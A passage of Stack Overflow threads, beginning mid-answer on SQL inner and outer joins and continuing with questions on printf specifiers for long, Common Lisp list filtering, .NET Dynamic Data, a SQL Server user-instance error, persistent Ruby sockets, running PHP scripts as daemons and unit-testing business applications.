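ON T1.title = T2.title AND T1.version < T2.version
WHERE T2.title IS NULL;   -- the outer join found no match, so T1 holds the max version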
A: Consider below 2 tables:
EMP
empid name dept_id salary
1 Rob 1 100
2 Mark 1 300
3 John 2 100
4 Mary 2 300
5 Bill 3 700
6 Jose 6 400
Department
deptid name
1 IT
2 Accounts
3 Security
4 HR
5 R&D
Inner Join:
Mostly written as just JOIN in sql queries. It returns only the matching records between the tables.
Find out all employees and their department names:
Select a.empid, a.name, b.name as dept_name
FROM emp a
JOIN department b
ON a.dept_id = b.deptid
;
empid name dept_name
1 Rob IT
2 Mark IT
3 John Accounts
4 Mary Accounts
5 Bill Security
As you see above, Jose is not printed from EMP in the output as its dept_id 6 does not find a match in the Department table. Similarly, the HR and R&D rows are not printed from the Department table as they didn't find a match in the Emp table.
So, INNER JOIN or just JOIN, returns only matching rows.
LEFT JOIN :
This returns all records from the LEFT table and only matching records from the RIGHT table.
Select a.empid, a.name, b.name as dept_name
FROM emp a
LEFT JOIN department b
ON a.dept_id = b.deptid
;
empid name dept_name
1 Rob IT
2 Mark IT
3 John Accounts
4 Mary Accounts
5 Bill Security
6 Jose
So, if you observe the above output, all records from the LEFT table(Emp) are printed with just matching records from RIGHT table.
HR and R&D rows are not printed from Department table as they didn't find a match in the Emp table on dept_id.
So, LEFT JOIN returns ALL rows from Left table and only matching rows from RIGHT table.
Can also check DEMO here.
A: There are a lot of good answers here with very accurate relational algebra examples. Here is a very simplified answer that might be helpful for amateur or novice coders with SQL coding dilemmas.
Basically, more often than not, JOIN queries boil down to two cases:
For a SELECT of a subset of A data:
*
*use INNER JOIN when the related B data you are looking for MUST exist per database design;
*use LEFT JOIN when the related B data you are looking for MIGHT or MIGHT NOT exist per database design (a minimal sketch of both cases follows below).
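A minimal sketch of the two cases, using hypothetical orders, customers, and coupons tables (not taken from the answer itself):
-- B data MUST exist (e.g. every order has a customer): INNER JOIN is safe
SELECT o.id, c.name
FROM orders o
JOIN customers c ON c.id = o.customer_id;
-- B data MIGHT NOT exist (e.g. an order may have no coupon): LEFT JOIN keeps the order
SELECT o.id, cp.code
FROM orders o
LEFT JOIN coupons cp ON cp.order_id = o.id;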
A: Simplest Definitions
Inner Join: Returns matched records from both tables.
Full Outer Join: Returns matched and unmatched records from both tables with null for unmatched records from Both Tables.
Left Outer Join: Returns matched and unmatched records only from table on Left Side.
Right Outer Join: Returns matched and unmatched records only from table on Right Side.
In-Short
Matched + Left Unmatched + Right Unmatched = Full Outer Join
Matched + Left Unmatched = Left Outer Join
Matched + Right Unmatched = Right Outer Join
Matched = Inner Join
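As a sketch of how the "unmatched" parts above can be selected on their own, assuming two hypothetical tables L and R joined on id:
-- Left Unmatched only: rows of L with no partner in R
SELECT L.*
FROM L
LEFT OUTER JOIN R ON R.id = L.id
WHERE R.id IS NULL;
-- Right Unmatched only: rows of R with no partner in L
SELECT R.*
FROM R
LEFT OUTER JOIN L ON L.id = R.id
WHERE L.id IS NULL;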
A: The General Idea
Please see the answer by Martin Smith for better illustrations and explanations of the different joins, including and especially the differences between FULL OUTER JOIN, RIGHT OUTER JOIN and LEFT OUTER JOIN.
These two table form a basis for the representation of the JOINs below:
CROSS JOIN
SELECT *
FROM citizen
CROSS JOIN postalcode
The result will be the Cartesian product of all combinations. No JOIN condition is required:
INNER JOIN
INNER JOIN is the same as simply: JOIN
SELECT *
FROM citizen c
JOIN postalcode p ON c.postal = p.postal
The result will be the combinations that satisfy the required JOIN condition:
LEFT OUTER JOIN
LEFT OUTER JOIN is the same as LEFT JOIN
SELECT *
FROM citizen c
LEFT JOIN postalcode p ON c.postal = p.postal
The result will be everything from citizen even if there are no matches in postalcode. Again a JOIN condition is required:
Data for playing
All examples have been run on an Oracle 18c. They're available at dbfiddle.uk which is also where screenshots of tables came from.
CREATE TABLE citizen (id NUMBER,
name VARCHAR2(20),
postal NUMBER, -- <-- could do with a redesign to postalcode.id instead.
leader NUMBER);
CREATE TABLE postalcode (id NUMBER,
postal NUMBER,
city VARCHAR2(20),
area VARCHAR2(20));
INSERT INTO citizen (id, name, postal, leader)
SELECT 1, 'Smith', 2200, null FROM DUAL
UNION SELECT 2, 'Green', 31006, 1 FROM DUAL
UNION SELECT 3, 'Jensen', 623, 1 FROM DUAL;
INSERT INTO postalcode (id, postal, city, area)
SELECT 1, 2200, 'BigCity', 'Geancy' FROM DUAL
UNION SELECT 2, 31006, 'SmallTown', 'Snizkim' FROM DUAL
UNION SELECT 3, 31006, 'Settlement', 'Moon' FROM DUAL -- <-- Uuh-uhh.
UNION SELECT 4, 78567390, 'LookoutTowerX89', 'Space' FROM DUAL;
Blurry boundaries when playing with JOIN and WHERE
CROSS JOIN
CROSS JOIN resulting in rows as The General Idea/INNER JOIN:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.postal = p.postal -- < -- The WHERE condition is limiting the resulting rows
Using CROSS JOIN to get the result of a LEFT OUTER JOIN requires tricks like adding in a NULL row. It's omitted.
INNER JOIN
INNER JOIN becomes a Cartesian product. It's the same as The General Idea/CROSS JOIN:
SELECT *
FROM citizen c
JOIN postalcode p ON 1 = 1 -- < -- The ON condition makes it a CROSS JOIN
This is where the inner join can really be seen as the cross join with results not matching the condition removed. Here none of the resulting rows are removed.
Using INNER JOIN to get the result of a LEFT OUTER JOIN also requires tricks. It's omitted.
LEFT OUTER JOIN
LEFT JOIN results in rows as The General Idea/CROSS JOIN:
SELECT *
FROM citizen c
LEFT JOIN postalcode p ON 1 = 1 -- < -- The ON condition makes it a CROSS JOIN
LEFT JOIN results in rows as The General Idea/INNER JOIN:
SELECT *
FROM citizen c
LEFT JOIN postalcode p ON c.postal = p.postal
WHERE p.postal IS NOT NULL -- < -- removes the row where there's no matching result from postalcode
The troubles with the Venn diagram
An image internet search on "sql join cross inner outer" will show a multitude of Venn diagrams. I used to have a printed copy of one on my desk. But there are issues with the representation.
Venn diagrams are excellent for set theory, where an element can be in one or both sets. But for databases, an element in one "set" seems, to me, to be a row in a table, and therefore not also present in any other table. There is no such thing as one row present in multiple tables. A row is unique to its table.
Self joins are a corner case where each element is in fact the same in both sets. But it's still not free of any of the issues below.
The set A represents the set on the left (the citizen table) and the set B is the set on the right (the postalcode table) in below discussion.
CROSS JOIN
Every element in both sets are matched with every element in the other set, meaning we need A amount of every B elements and B amount of every A elements to properly represent this Cartesian product. Set theory isn't made for multiple identical elements in a set, so I find Venn diagrams to properly represent it impractical/impossible. It doesn't seem that UNION fits at all.
The rows are distinct. The UNION is 7 rows in total. But they're incompatible for a common SQL results set. And this is not how a CROSS JOIN works at all:
Trying to represent it like this:
..but now it just looks like an INTERSECTION, which it's certainly not. Furthermore there's no element in the INTERSECTION that is actually in any of the two distinct sets. However, it looks very much like the searchable results similar to this:
For reference one searchable result for CROSS JOINs can be seen at Tutorialgateway. The INTERSECTION, just like this one, is empty.
INNER JOIN
The value of an element depends on the JOIN condition. It's possible to represent this under the condition that every row becomes unique to that condition. Meaning id=x is only true for one row. Once a row in table A (citizen) matches multiple rows in table B (postalcode) under the JOIN condition, the result has the same problems as the CROSS JOIN: The row needs to be represented multiple times, and the set theory isn't really made for that. Under the condition of uniqueness, the diagram could work though, but keep in mind that the JOIN condition determines the placement of an element in the diagram. Looking only at the values of the JOIN condition with the rest of the row just along for the ride:
This representation falls completely apart when using an INNER JOIN with a ON 1 = 1 condition making it into a CROSS JOIN.
With a self-JOIN, the rows are in fact identical elements in both tables, but representing the table as both A and B isn't very suitable. For example, a common self-JOIN condition that makes an element in A match a different element in B is ON A.parent = B.child, making the match from A to B on separate elements. From the examples that would be SQL like this:
SELECT *
FROM citizen c1
JOIN citizen c2 ON c1.id = c2.leader
Meaning Smith is the leader of both Green and Jensen.
OUTER JOIN
Again the troubles begin when one row has multiple matches to rows in the other table. This is further complicated because the OUTER JOIN can be thought of as matching against the empty set. But in set theory the union of any set C and an empty set is always just C. The empty set adds nothing. The representation of this LEFT OUTER JOIN is usually just showing all of A to illustrate that rows in A are selected regardless of whether there is a match or not from B. The "matching elements" however have the same problems as the illustration above. They depend on the condition. And the empty set seems to have wandered over to A:
WHERE clause - making sense
Finding all rows from a CROSS JOIN with Smith and postalcode on the Moon:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.name = 'Smith'
AND p.area = 'Moon';
Now the Venn diagram isn't used to reflect the JOIN. It's used only for the WHERE clause:
..and that makes sense.
When INTERSECT and UNION makes sense
INTERSECT
As explained, an INNER JOIN is not really an INTERSECT. However, INTERSECT can be used on the results of separate queries. Here a Venn diagram makes sense, because the elements from the separate queries are in fact rows that belong either to just one of the results or to both. Intersect will obviously only return results where the row is present in both queries. This SQL will result in the same row as the one above using WHERE, and the Venn diagram will also be the same:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.name = 'Smith'
INTERSECT
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE p.area = 'Moon';
UNION
An OUTER JOIN is not a UNION. However, UNION works under the same conditions as INTERSECT, resulting in a return of all results, combining both SELECTs:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.name = 'Smith'
UNION
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE p.area = 'Moon';
which is equivalent to:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.name = 'Smith'
OR p.area = 'Moon';
..and gives the result:
Also here a Venn diagram makes sense:
When it doesn't apply
An important note is that these only work when the structure of the results from the two SELECTs is the same, enabling a comparison or union. The results of these two will not enable that:
SELECT *
FROM citizen
WHERE name = 'Smith'
SELECT *
FROM postalcode
WHERE area = 'Moon';
..trying to combine the results with UNION gives a
ORA-01790: expression must have same datatype as corresponding expression
For further interest read Say NO to Venn Diagrams When Explaining JOINs and sql joins as venn diagram. Both also cover EXCEPT.
A: Joins are used to combine the data from two tables, with the result being a new, temporary table. Joins are performed based on something called a predicate, which specifies the condition to use in order to perform a join. The difference between an inner join and an outer join is that an inner join will return only the rows that actually match based on the join predicate.
For example, let's consider the Employee and Location tables:
Employee
EmpID | EmpName
------+---------
13    | Jason
8     | Alex
3     | Ram
17    | Babu
25    | Johnson
Location
EmpID | EmpLoc
------+------------------
13    | San Jose
8     | Los Angeles
3     | Pune, India
17    | Chennai, India
39    | Bangalore, India
Inner Join:-
Inner join creates a new result table by combining column values of two tables (Employee and Location) based upon the join-predicate. The query compares each row of Employee with each row of Location to find all pairs of rows which satisfy the join-predicate. When the join-predicate is satisfied by matching non-NULL values, column values for each matched pair of rows of Employee and Location are combined into a result row.
Here’s what the SQL for an inner join will look like:
select * from employee inner join location on employee.empID = location.empID
OR
select * from employee, location where employee.empID = location.empID
Now, here is what the result of running that SQL would look like:
Employee.EmpId | Employee.EmpName | Location.EmpId | Location.EmpLoc
---------------+------------------+----------------+-----------------
13             | Jason            | 13             | San Jose
8              | Alex             | 8              | Los Angeles
3              | Ram              | 3              | Pune, India
17             | Babu             | 17             | Chennai, India
Outer Join:-
An outer join does not require each record in the two joined tables to have a matching record. The joined table retains each record—even if no other matching record exists. Outer joins subdivide further into left outer joins and right outer joins, depending on which table's rows are retained (left or right).
Left Outer Join:-
The result of a left outer join (or simply left join) for tables Employee and Location always contains all records of the "left" table (Employee), even if the join-condition does not find any matching record in the "right" table (Location).
Here is what the SQL for a left outer join would look like, using the tables above:
select * from employee left outer join location on employee.empID = location.empID;
//Use of outer keyword is optional
Now, here is what the result of running this SQL would look like:
Employee.EmpId | Employee.EmpName | Location.EmpId | Location.EmpLoc
---------------+------------------+----------------+-----------------
13             | Jason            | 13             | San Jose
8              | Alex             | 8              | Los Angeles
3              | Ram              | 3              | Pune, India
17             | Babu             | 17             | Chennai, India
25             | Johnson          | NULL           | NULL
Note how while Johnson has no entry in the employee location table, he is still included in the results but the location fields are nulled.
Right Outer Join:-
A right outer join (or right join) closely resembles a left outer join, except with the treatment of the tables reversed. Every row from the "right" table (Location) will appear in the joined table at least once. If no matching row from the "left" table (Employee) exists, NULL will appear in columns from Employee for those records that have no match in Location.
This is what the SQL looks like:
select * from employee right outer join location on employee.empID = location.empID;
//Use of outer keyword is optional
Using the tables above, we can show what the result set of a right outer join would look like:
Employee.EmpId | Employee.EmpName | Location.EmpId | Location.EmpLoc
---------------+------------------+----------------+------------------
13             | Jason            | 13             | San Jose
8              | Alex             | 8              | Los Angeles
3              | Ram              | 3              | Pune, India
17             | Babu             | 17             | Chennai, India
NULL           | NULL             | 39             | Bangalore, India
Note how while there are no employees listed as working in Bangalore, it is still included in the results with the employee fields nulled out.
Full Outer Joins:-
Full Outer Join (or Full Join) retains the nonmatching information by including nonmatching rows in the result of the join. It includes all rows from both tables, regardless of whether or not the other table has a matching value.
Employee.EmpId | Employee.EmpName | Location.EmpId | Location.EmpLoc
---------------+------------------+----------------+------------------
13             | Jason            | 13             | San Jose
8              | Alex             | 8              | Los Angeles
3              | Ram              | 3              | Pune, India
17             | Babu             | 17             | Chennai, India
25             | Johnson          | NULL           | NULL
NULL           | NULL             | 39             | Bangalore, India
MySQL 8.0 Reference Manual - Join Syntax
Oracle Join operations
A: The difference between inner join and outer join is as follow:
*
*Inner join is a join that combines tables based on matching tuples, whereas outer join is a join that combines tables based on both matched and unmatched tuples.
*Inner join merges the matched rows from two tables and omits unmatched rows, whereas outer join merges rows from two tables and fills unmatched rows with NULL values.
*Inner join is like an intersection operation, whereas outer join is like a union operation.
*Inner join has two types, whereas outer join has three types (left, right, and full).
*Inner join is generally at least as fast as outer join, since the optimizer has more freedom to reorder and optimize inner joins.
A: Inner Join
Retrieve the matched rows only, that is, A intersect B.
SELECT *
FROM dbo.Students S
INNER JOIN dbo.Advisors A
ON S.Advisor_ID = A.Advisor_ID
Left Outer Join
Select all records from the first table, and any records in the second
table that match the joined keys.
SELECT *
FROM dbo.Students S
LEFT JOIN dbo.Advisors A
ON S.Advisor_ID = A.Advisor_ID
Full Outer Join
Select all records from both tables, whether or not the joined keys
match; where there is no match, the missing side is filled with NULLs.
SELECT *
FROM dbo.Students S
FULL JOIN dbo.Advisors A
ON S.Advisor_ID = A.Advisor_ID
References
*
*Inner and outer joins SQL examples and the Join block
*SQL: JOINS
A: In Simple Terms,
1. INNER JOIN or EQUI JOIN: returns only the rows that satisfy the join condition in both tables.
2. OUTER JOIN: returns the rows from both tables whether or not the condition matches.
3. LEFT JOIN: returns all rows from the left table, plus only the rows from the right table that match the condition.
4. RIGHT JOIN: returns all rows from the right table, plus only the rows from the left table that match the condition.
5. FULL JOIN: Full Join and Full Outer Join are the same.
A: In simple words:
An inner join retrieves the matched rows only.
Whereas an outer join retrieves the matched rows from one table and all rows from the other table; the result depends on which one you are using:
*
*Left: Matched rows in the right table and all rows in the left table
*Right: Matched rows in the left table and all rows in the right table or
*Full: All rows in all tables. It doesn't matter if there is a match or not
A: An inner join only shows rows if there is a matching record on the other (right) side of the join.
A (left) outer join shows rows for each record on the left hand side, even if there are no matching rows on the other (right) side of the join. If there is no matching row, the columns for the other (right) side would show NULLs.
A: Inner joins require that a record with a related ID exist in the joined table.
Outer joins will return records for the left side even if nothing exists for the right side.
For instance, you have an Orders and an OrderDetails table. They are related by an "OrderID".
Orders
*
*OrderID
*CustomerName
OrderDetails
*
*OrderDetailID
*OrderID
*ProductName
*Qty
*Price
The request
SELECT Orders.OrderID, Orders.CustomerName
FROM Orders
INNER JOIN OrderDetails
ON Orders.OrderID = OrderDetails.OrderID
will only return Orders that also have something in the OrderDetails table.
If you change it to a LEFT OUTER JOIN
SELECT Orders.OrderID, Orders.CustomerName
FROM Orders
LEFT JOIN OrderDetails
ON Orders.OrderID = OrderDetails.OrderID
then it will return records from the Orders table even if they have no OrderDetails records.
You can use this to find Orders that do not have any OrderDetails indicating a possible orphaned order by adding a where clause like WHERE OrderDetails.OrderID IS NULL.
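For example, that orphan check might look like this (a sketch, using the same hypothetical Orders/OrderDetails tables from above):
SELECT Orders.OrderID, Orders.CustomerName
FROM Orders
LEFT JOIN OrderDetails
ON Orders.OrderID = OrderDetails.OrderID
WHERE OrderDetails.OrderID IS NULL   -- no matching detail row: possible orphaned order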
A: A Demonstration
Setup
Hop into psql and create a tiny database of cats and humans.
You can just copy-paste this whole section.
CREATE DATABASE catdb;
\c catdb;
\pset null '[NULL]' -- how to display null values
CREATE TABLE humans (
name text primary key
);
CREATE TABLE cats (
human_name text references humans(name),
name text
);
INSERT INTO humans (name)
VALUES ('Abe'), ('Ann'), ('Ben'), ('Jen');
INSERT INTO cats (human_name, name)
VALUES
('Abe', 'Axel'),
(NULL, 'Bitty'),
('Jen', 'Jellybean'),
('Jen', 'Juniper');
Querying
Here's a query we'll run several times, changing [SOMETHING JOIN] to the various types to see the results.
SELECT
humans.name AS human_name,
cats.name AS cat_name
FROM humans
[SOMETHING JOIN] cats ON humans.name = cats.human_name
ORDER BY humans.name;
An INNER JOIN returns all human-cat pairs.
Any human without a cat or cat without a human is excluded.
human_name | cat_name
------------+-----------
Abe | Axel
Jen | Jellybean
Jen | Juniper
A FULL OUTER JOIN returns all humans and all cats, with NULL if there is no match on either side.
human_name | cat_name
------------+-----------
Abe | Axel
Ann | [NULL]
Ben | [NULL]
Jen | Jellybean
Jen | Juniper
[NULL] | Bitty
A LEFT OUTER JOIN returns all humans (the left table).
Any human without a cat gets a NULL in the cat_name column.
Any cat without a human is excluded.
human_name | cat_name
------------+-----------
Abe | Axel
Ann | [NULL]
Ben | [NULL]
Jen | Jellybean
Jen | Juniper
A RIGHT OUTER JOIN returns all cats (the right table).
Any cat without a human gets a NULL in the human_name column.
Any human without a cat is excluded.
human_name | cat_name
------------+-----------
Abe | Axel
Jen | Jellybean
Jen | Juniper
[NULL] | Bitty
INNER vs OUTER
You can see that while an INNER JOIN gets only matching pairs, each kind of OUTER join includes some items without a match.
However, the actual words INNER and OUTER do not need to appear in queries:
*
*JOIN by itself implies INNER
*LEFT JOIN, RIGHT JOIN and OUTER JOIN all imply OUTER
A: The "outer" and "inner" are just optional elements, you are just dealing with two (three) kinds of joins. Inner joins (or what is the default when using only "join") is a join where only the elements that match the criteria are present on both tables.
The "outer" joins are the same as the inner join plus the elements of the left or right table that didn't match, adding nulls on all columns for the other table.
The full join is the inner plus the right and left joins.
In summary, if we have table A like this
idA | ColumnTableA | idB
----+--------------+------
1   | Jonh         | 1
2   | Sarah        | 1
3   | Clark        | 2
4   | Barbie       | NULL
And table B like this:
idB | ColumnTableB
----+--------------
1   | Connor
2   | Kent
3   | Spock
The inner join:
from tableA join tableB on tableA.idB = tableB.idB
idA | ColumnTableA | idB | ColumnTableB
----+--------------+-----+--------------
1   | Jonh         | 1   | Connor
2   | Sarah        | 1   | Connor
3   | Clark        | 2   | Kent
Left outer join:
from tableA left join tableB on tableA.idB = tableB.idB
idA  | ColumnTableA | idB  | ColumnTableB
-----+--------------+------+--------------
1    | Jonh         | 1    | Connor
2    | Sarah        | 1    | Connor
3    | Clark        | 2    | Kent
4    | Barbie       | NULL | NULL
Right outer join:
from tableA right join tableB on tableA.idB = tableB.idB
idA  | ColumnTableA | idB  | ColumnTableB
-----+--------------+------+--------------
1    | Jonh         | 1    | Connor
2    | Sarah        | 1    | Connor
3    | Clark        | 2    | Kent
NULL | NULL         | 3    | Spock
Full outer join:
from tableA full join tableB on tableA.idB = tableB.idB
idA  | ColumnTableA | idB  | ColumnTableB
-----+--------------+------+--------------
1    | Jonh         | 1    | Connor
2    | Sarah        | 1    | Connor
3    | Clark        | 2    | Kent
4    | Barbie       | NULL | NULL
NULL | NULL         | 3    | Spock
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38549",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5160"
} |
Q: What is the conversion specifier for printf that formats a long? The printf function takes an argument type, such as %d or %i for a signed int. However, I don't see anything for a long value.
A: On many platforms (32-bit systems, and 64-bit Windows), long and int are the same size (32 bits). Still, long does have its own format specifier:
long n;
unsigned long un;
printf("%ld", n); // signed
printf("%lu", un); // unsigned
For 64 bits, you'd want a long long:
long long n;
unsigned long long un;
printf("%lld", n); // signed
printf("%llu", un); // unsigned
Oh, and of course, it's different in Windows:
printf("%l64d", n); // signed
printf("%l64u", un); // unsigned
Frequently, when I'm printing 64-bit values, I find it helpful to print them in hex (usually with numbers that big, they are pointers or bit fields).
unsigned long long n;
printf("0x%016llX", n); // "0x" followed by "0-padded", "16 char wide", "long long", "HEX with 0-9A-F"
will print:
0x00000000DEADBEEF
Btw, "long" doesn't mean that much anymore (on mainstream x64). "int" is the platform default int size, typically 32 bits. "long" is usually the same size. However, they have different portability semantics on older platforms (and modern embedded platforms!). "long long" is a 64-bit number and usually what people meant to use unless they really really knew what they were doing editing a piece of x-platform portable code. Even then, they probably would have used a macro instead to capture the semantic meaning of the type (eg uint64_t).
char c; // 8 bits
short s; // 16 bits
int i; // 32 bits (on modern platforms)
long l; // 32 bits on Windows/ILP32, 64 bits on LP64 (most 64-bit Unix)
long long ll; // 64 bits
Back in the day, "int" was 16 bits. You'd think it would now be 64 bits, but no, that would have caused insane portability issues. Of course, even this is a simplification of the arcane and history-rich truth. See wiki:Integer
A: Put an l (lowercased letter L) directly before the specifier.
unsigned long n;
long m;
printf("%lu %ld", n, m);
A: I think you mean:
unsigned long n;
printf("%lu", n); // unsigned long
or
long n;
printf("%ld", n); // signed long
A: It depends, if you are referring to unsigned long the formatting character is "%lu". If you're referring to signed long the formatting character is "%ld".
A: %ld see printf reference on cplusplus.com
A: I needed to print unsigned long long, so I found this works:
unsigned long long n;
printf("%llu", n);
For all other combinations, I believe you use the table from the printf manual, taking the row, then column label for whatever type you're trying to print (as I do with printf("%llu", n) above).
A: I think to answer this question definitively would require knowing the compiler name and version that you are using and the platform (CPU type, OS etc.) that it is compiling for.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38561",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "595"
} |
Q: Common lisp idiom - is there a better way? I find myself doing this sort of thing all the time. I've been considering writing a macro/function to make this sort of thing easier, but it occurs to me that I'm probably reinventing the wheel.
Is there an existing function that will let me accomplish this same sort of thing more succinctly?
(defun remove-low-words (word-list)
"Return a list with words of insufficient score removed."
(let ((result nil))
(dolist (word word-list)
(when (good-enough-score-p word) (push word result)))
result))
A: The function you want is remove-if-not, which is built-in.
(defun remove-low-words (word-list)
(remove-if-not #'good-enough-score-p word-list))
If you feel like you are re-inventing something to do with lists, you probably are. Check the Hyperspec to see.
*
*The Hyperspec documentation on remove-if-not
*All sequence functions
*All list-specific functions
A: There are several built-in ways of doing this. One way would be:
(remove-if-not 'good-enough-score-p word-list)
And another:
(loop for word in word-list
when (good-enough-score-p word)
collect word)
And yet another:
(mapcan (lambda (word)
(when (good-enough-score-p word)
(list word)))
word-list)
Etc... There's also SERIES and Iterate. The Iterate version is identical to the LOOP version, but the SERIES version is interesting:
(collect (choose-if 'good-enough-score-p (scan word-list))))
So, yes, you're very likely to reinvent some wheel. :-)
A: There are a couple ways you can do this. First, and probably most easily, you can do it recursively.
(defun remove-low-words (word-list)
  (cond ((null word-list) nil)                      ; base case: empty list
        ((good-enough-score-p (car word-list))      ; keep this word
         (cons (car word-list) (remove-low-words (cdr word-list))))
        (t (remove-low-words (cdr word-list)))))    ; drop this word
You could also do it with mapcar and reduce, where the former can construct you a list with failing elements replaced by nil and the latter can be used to filter out the nil.
Either would be a good candidate for a "filter" macro or function that takes a list and returns the list filtered by some predicate.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38571",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Is .NET 3.5 SP1 Required on the server to use Dynamic Data? Is .NET 3.5 SP1 Required on the server to use Dynamic Data?
It looks like it generates a lot of code and therefore wouldn't require anything special on the server side. I ask because I would like to use it but the shared hosting provider my client is using only have 3.5 installed and not 3.5 SP1.
A: Yes, SP1 is required.
There are several bits of SP1 that Dynamic Data uses, notably the ASP.NET routing extensions and the new data annotation classes in System.ComponentModel.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38572",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Did Installing OneCare cause a "Generating user instances in SQL Server is disabled" error? Did Installing OneCare cause a "Generating user instances in SQL Server is disabled" error?
The only change that I've made to my computer is uninstalling AVG and installing the trial for Microsoft OneCare. Did OneCare change the SQLServer installation somehow?
This is a very "odd" question but is something I would post on EE in hopes of someone having had the same issue and giving their solution.
A: I would look more at the uninstalling of AVG as the culprit. OneCare does not care about or even notice SQL Server instances as far as I can tell, whereas AVG does.
I would look into your SQL Server instance and check the jobs. One or more may have been added by AVG. You should remove them. You might also want to drop the AVG database. Just to be sure.
Note: I have never uninstalled AVG. I just have notice some of what it did to my Database when my SysAdmin installed it. Being an Accidental DBA I haven't had the time to properly evaluate it's actions.
A: The problem is your connection string. When using SQLExpress you can set it to run user instances so that each application has its own instance of SQL Server. Just set the option to false in your connection string and the problem should disappear.
A: I didn't see anything odd in the event viewer or any db's for avg in SQLServer. btw I installed SQL server after AVG. it's curious anyway. I'll just make a VM and do a fresh install of SQLExpress so I can finish a few projects.
it's been over a year so it's time for the annual reformat and reinstall ;-)
A: @baldy
Thanks. I'll look at as well. Oddly enough though I didn't change the connection string at all. And when I created a new project and tried to drag-n-drop a DB into the LINQ to SQL diagram that error was raised then as well.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38589",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How do I make persistent network sockets on Unix in Ruby? I'd like to be able to write a ruby program that can restart without dropping it's socket connections.
A: This program gets Google's homepage and then when you pass it SIG_INT via Ctrl-C it restarts the program and reads the output of the homepage from the open socket with Google.
#!/usr/bin/ruby
#simple_connector.rb
require 'socket'
puts "Started."
if ARGV[0] == "restart"
sock = IO.open(ARGV[1].to_i)
puts sock.read
exit
else
sock = TCPSocket.new('google.com', 80)
sock.write("GET /\n")
end
Signal.trap("INT") do
puts "Restarting..."
exec("ruby simple_connector.rb restart #{sock.fileno}")
end
while true
sleep 1
end
A: You're talking about network sockets, not UNIX sockets I assume?
I'm not sure this suits your needs, but the way I would do it is by separating the networking and logic parts, and only restarting the logic part, then reconnecting it to the networking part.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38592",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: What's the best way to keep a PHP script running as a daemon? What is the best way to keep a PHP script running as a daemon, and what's the best way to check if needs restarting.
I have some scripts that need to run 24/7 and for the most part I can run them using nohup. But if they go down, what's the best way to monitor it so it can be automatically restarted?
A: The most elegant solution is reactPHP.
A: If you can't use the (proper) init structure to do this (you're on shared hosting, etc.), use cron to run a script (it can be written in whatever language you like) every few minutes that checks to see if they're running, and restarts them if necessary.
A: Quick and dirty cron to restart your daemon:
* * * * * USER ps auxww | grep [S]CRIPTNAME > /dev/null || SCRIPTNAME
Replace USER with the user that the daemon runs as and SCRIPTNAME with the name of your script. The [S] bracket keeps grep from matching its own command line, so the restart actually fires when the script is down. Stick this in /etc/cron.d/restart_php_daemon. It should run every minute. Change the first * to */2 or */5 to run less frequently.
UPDATE
If you're putting this into your own crontab:
Run crontab -e and add:
* * * * * ps auxwww | grep [S]CRIPTNAME > /dev/null || SCRIPTNAME
A: We run our daemons by piping the output to mail.
php daemon.php | mail -s "daemon stopped" [email protected]
That way, when/if the daemon stops, it will send a mail, and we will be notified that way.
It still means manual restart of the daemons of course, but we'll know right away. Usually, if the daemons stopped, it means that there is something else that needs to be taken care of anyway, so that's usually ok.
A: I've had success with running a wget and sending the result to /dev/null on a shared server.
A: Daemon is a linux process that runs in background; apache or mysql are daemons.
In a Linux environment, we can run a background program using a cron job, but that has some limitations, and in some scenarios it's not a good idea.
For example, using a cron job, we can't control whether the previous run has finished yet.
So often it's more convenient run a process as a daemon.
// Daemonize
$pid = pcntl_fork(); // parent gets the child PID and child gets 0
if($pid){ // if pid is not 0
// Only the parent will know the PID. Kids aren't self-aware
// Parent says goodbye!
print "Parent : " . getmypid() . " exiting\n";
exit();
}
print "Child : " . getmypid() . "\n";
The code above is taken from very good article about how to create a daemon in php. You can read this at link
A: I use a PHP-based script to read from a database and send emails out (using the PEAR Mail_Queue library). I run it from within a bash script and based on the returned result (from "exit $status;") either halt, sleep X seconds, or immediately restart. (I also put a check of the load average/sleep into the PHP script to avoid stressing the mail system).
If it was for a long-term daemon that had to be continually running, then I agree, it probably would not be the best thing to run this (though I have heard of some socket servers that did run successfully long term), however, PHP 5.3 does also now have improved garbage collection, and if the script is well written enough to not exit unplanned, then memory should be far less of a problem that before.
A: TBH, PHP probably isn't the best tool for this, really not what it was designed for. I've heard of memory leaks and other bad things happening when you try this. Also bear in mind PHP only has a finite amount of resource ids (for file handles, db connections ect) per execution of a script.
Be better of using something else, maybe python or perl, though I don't have any real experience writing these sorts of apps, but I do know PHP isn't right for what your trying to do.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38596",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: How do you unit test business applications? How are people unit testing their business applications? I've seen a lot of examples of unit testing with "simple to test" examples. Ex. a calculator. How are people unit testing data-heavy applications? How are you putting together your sample data? In many cases, data for one test may not work at all for another test which makes it hard to just have one test database?
Testing the data access portion of the code is fairly straightforward. It's testing out all the methods that work against the data that seem to be hard to test. For example, imagine a posting process where there is heavy data access to determine what is posted, numbers are adjusted, etc. There are a number of interim steps that occur (and need to be tested) along with tests afterwards that ensure the posting was successful. Some of those steps may actually be stored procedures.
